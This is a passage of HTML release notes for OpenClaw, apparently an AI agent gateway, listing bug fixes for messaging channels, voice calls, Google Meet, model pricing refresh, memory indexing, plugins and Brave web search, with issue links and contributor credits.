<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
